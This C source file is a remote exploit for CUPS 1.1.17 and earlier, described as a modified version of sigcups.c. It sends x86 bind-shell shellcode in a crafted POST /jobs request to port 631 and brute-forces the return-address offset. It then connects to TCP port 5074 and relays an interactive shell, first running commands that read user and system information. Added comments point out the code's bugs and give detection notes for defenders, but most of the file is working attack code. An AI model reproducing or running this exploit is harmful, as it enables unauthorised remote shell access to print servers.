Cups v1.1.17 and below remote exploit which spawns a shell as lp. Modified version of the original sigcups.c exploit.
5a88fad62d69412d2762fa193f415a3d84cba3182a07cc0ff828178c6b46a28d
/* DEMOCOW-BRUTE-CUPS.c by democow "the sad cow"
this is a modified version of sigcups.c by sigdoon
i had a need for this, so i wrote this
i am sad because so much open source/public exploit code is abused
by info$ec now any open discussion has become
their helping hand in other words.........
young fish must not eat their tainted worms
TODO:
1. add support for new cups partial request DoS just for fun
2. look through cups source a little more and find a better way to ID
vulnerable servers
3. improve the server-offset feature
4. add arm shellcode,and libc addrs
5. add hostlookups
THIS CODE IS PRIVATE, DO NOT DISTRIBUTE... DO NOT SUPPORT THE INFO$EC
INDUSTRY, THEY ARE EXPLOITING YOU WITH YOUR EXPLOITS
democow8086@hotmail.com
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#define BUF_SIZE 4096
#define SERVER_ID "CUPS/1.1" //8 bytes long
#define die(a) { perror("[!] "a); exit(-1); }
//this will be added to when the correct offsets for
//certain systems have been found
// Placeholder record for a fingerprinted server: a numeric type, an OS
// string and the offset that would be used for it. Nothing in this file
// reads or fills an instance of it yet (see TODO items 2 and 3 above).
typedef struct identified
{
int type;
char os[1040];   // size appears arbitrary; no code here bounds writes into it
int offset;
}target;
// buildAttack: open one TCP connection to host:port and send a single HTTP
// POST to /jobs. The form-urlencoded body is one attribute whose name is
// "-<retaddr>" (retaddr = 805289688 + offset, printed with %u) and whose
// value is every byte of hellcode percent-encoded as %XX. The socket is
// closed right after the two write() calls; no response is read.
//
// Returns 0 once the request has been written, 1 if offset is negative or
// if socket()/connect() fails. The return value says nothing about whether
// the server accepted or processed the request.
//
// Detection note (defender): the request this produces is distinctive —
// POST /jobs, Content-type: application/x-www-form-urlencoded, a body key
// that is a leading '-' followed by a large decimal number, then ~390 bytes
// of consecutive %XX escapes. Header lines are terminated with "\n" only,
// not "\r\n". A request matching that shape against a print server is
// worth alerting on regardless of whether the target version is affected.
//
// Portability notes: inet_addr(), strlen() and exit() (via die()) are used
// without <arpa/inet.h>, <string.h> and <stdlib.h>, so they are implicitly
// declared; retaddr is an unsigned long but is printed with %x; the
// return values of both write() calls are ignored.
int buildAttack(int offset,char *host, int port)
{
// raw payload bytes; they are never executed locally, only percent-encoded
// into the request body below (130 bytes, so 3*130 + the key fits in buf)
char hellcode[]=
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
struct sockaddr_in dest;
int i,off,sock;
unsigned long retaddr = 805289688;   // 0x30000558; offset is added below
char buf[BUF_SIZE];     // request body
char buf2[BUF_SIZE];    // request line + headers
// header template; note bare "\n" line endings and a trailing blank line
char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";
// body key template: '-' then retaddr as an unsigned decimal, then '='
char evilmsg[] = "-%u=";
//it is just sad to have an integer overflow
//within an integer overflow exploit
// a negative offset would pull retaddr below the base; reject it here
if(offset < 0)
{
printf("[*] integer overflow alert please increase the size of offset\n");
return 1;
}
retaddr += offset;
printf("[*] connecting to %s port %d\n", host, port);
// %x with an unsigned long is a format/argument mismatch on LP64 targets
printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);
printf("[*] the current offset is %i\n",offset);
if ( (sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
{
perror("socket()");
return 1; //return fail
}
dest.sin_family = AF_INET;
dest.sin_port = htons(port);
dest.sin_addr.s_addr = inet_addr(host);   // no check for INADDR_NONE on a bad host string
bzero( &(dest.sin_zero), 8);
if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))<0)
{
perror("connect()");
return 1; //return fail
}
printf("[*] connect created attempting to brute\n");
// off = length of the "-<retaddr>=" key; the encoded payload follows it
off = sprintf(buf, evilmsg, retaddr);
// each payload byte becomes exactly three characters: '%' + two hex digits,
// so successive writes land at buf+off, buf+off+3, ... and each sprintf
// re-terminates the string
for(i = 0; i<sizeof(hellcode)-1; i++)
sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);
//load greet
// Content-length is the body length computed by strlen(buf)
sprintf(buf2, greet, strlen(buf));
//send our crafted data out
// two separate writes (headers, then body); short writes are not handled
write(sock, buf2, strlen(buf2) );
write(sock,buf, strlen(buf) );
close(sock);
return 0; //attack sent :) be happy you sad cow
}
//this will verify if the exploit worked
// shellConnect: after a fixed 3-second delay, connect to host on TCP port
// 5074, send "id;uname -a;cat /etc/*rel*\n" and then relay bytes between
// stdin and the socket with select() until the socket read returns <= 0.
//
// Returns 1 if connect() fails, 2 once the remote side closes (the caller
// treats this as "connection lost"). socket() failure calls die(), which
// exits the process. The trailing `return 0` cannot be reached because the
// loop condition below is an assignment and is therefore always true.
//
// Detection note (defender): a process on a print server that was not
// listening before and now accepts connections on TCP/5074, or an inbound
// session to that port immediately following a POST /jobs request, is the
// indicator this function depends on. Egress/ingress rules that only allow
// the IPP port (631) to the print server would block this step entirely.
//
// Portability notes: inet_addr() is used without <arpa/inet.h>, exit()
// (inside die()) without <stdlib.h>, select()/FD_* without <sys/select.h>;
// whether they resolve depends on what the platform's headers pull in.
int shellConnect(char *host)
{
struct sockaddr_in target;   // shadows the file-scope typedef name `target`
fd_set rset;
int socketfd;
int happy = 0;
int incomming;
char buffer[BUF_SIZE];
//i want to let socket() errors end the program in a messy way
if( (socketfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
die("socket()");
target.sin_family = AF_INET;
target.sin_port = htons(5074);
target.sin_addr.s_addr = inet_addr(host);
bzero(&(target.sin_zero), 8);
//note to democow rewrite this ASAP
// spawns /bin/sh just to sleep; sleep(3) from <unistd.h> would do the same
// without a shell invocation
system("sleep 3");
if(connect(socketfd, (struct sockaddr*)&target,sizeof(struct sockaddr)) < 0)
{
perror("connect");
return 1;//return with exploit fail
} else { happy = 1;}
// 27 is the exact length of the literal; the return value is not checked
write(socketfd,"id;uname -a;cat /etc/*rel*\n",27);
// assignment, not comparison: this loop only ends via the return below
while(happy =1)
{
FD_ZERO(&rset);
FD_SET(socketfd,&rset);
FD_SET(STDIN_FILENO, &rset);
// blocking select with no timeout; its return value (including EINTR) is ignored
select(socketfd+1,&rset,NULL, NULL, NULL);
if(FD_ISSET(socketfd,&rset) )
{
// BUF_SIZE-1 leaves room for the terminator written below
incomming = read(socketfd,buffer, BUF_SIZE-1);
if(incomming <= 0)
{
printf("[*] Connection Lost Sorry Mate\n");
close(socketfd);
return 2; //return with a conn lost retry
}
buffer[incomming] = 0;
// remote data is printed as-is; it is untrusted and may contain
// terminal control sequences
printf("%s", buffer);
}
if(FD_ISSET(STDIN_FILENO, &rset) )
{
incomming = read(STDIN_FILENO, buffer, BUF_SIZE - 1);
if(incomming > 0)
{
buffer[incomming] = 0;
write(socketfd, buffer, incomming);
} //end if(incomming)
// EOF on stdin (read returns 0) is not handled, so select() will keep
// reporting stdin readable and the loop spins
}//end STDIN_FILENO check
}//end while
return 0; //this will never be reached
}
// main: take the target IP from argv[1], then loop: send one request via
// buildAttack() with the current offset against port 631, try
// shellConnect(), and bump the offset for the next round. A buildAttack()
// failure (return 1) ends the program.
//
// Note on the switch below: its case labels are the character literals
// '1', '2', '0' (values 49, 50, 48), but shellConnect() returns the
// integers 0, 1 and 2, so none of the labelled cases can ever match and
// every result falls into `default`, which increments offset and keeps
// looping. In particular a return of 0 does not stop the loop here.
// The printf after the loop is unreachable because the only exits from
// the loop are the `return 0` statements inside it.
int main(int argc, char *argv[])
{
int running;
int offset;
char *target;   // only assigned when argc >= 2; see the usage branch below
int temp;
running = 1;
offset = 0;
if(argc < 2)
{
printf("USEAGE %s [IP TO ATTACK]\n",argv[0]);
//this is all one big joke to me
// presumably meant as a raw Linux/x86 exit syscall (eax = 1). Only %al
// is set, so the upper bytes of %eax are whatever was there; if this does
// not terminate the process, execution continues with `target`
// uninitialized. Not portable off 32-bit x86 Linux.
__asm__("movb $0x01, %al");
__asm__("int $0x80");
} else { target = argv[1]; }
//start the fun loop :)
while(running == 1)
{
// 631 is the standard IPP port
if( (temp= buildAttack(offset,target,631)) ==1)
{
printf("major connection failure aborting\n");
running = 0; //connection failures are upsetting
return 0;
}
// character-literal labels vs. integer return values: see the note above
switch ( (temp = shellConnect(target) ))
{
case '1': //general fail.. i except aton of these
offset++;
break;
case '2':
offset = offset; //i could do nothing but dun wanna
break;
case '0': //are we all done?
return 0; //i dont understand why i do this
break;
default:
offset++; //why not
break;
}
}
printf("you are a beast of your mind mr. cow\n");
return 0;
}
--
This message has been sent via an anonymous mail relay at www.no-id.com.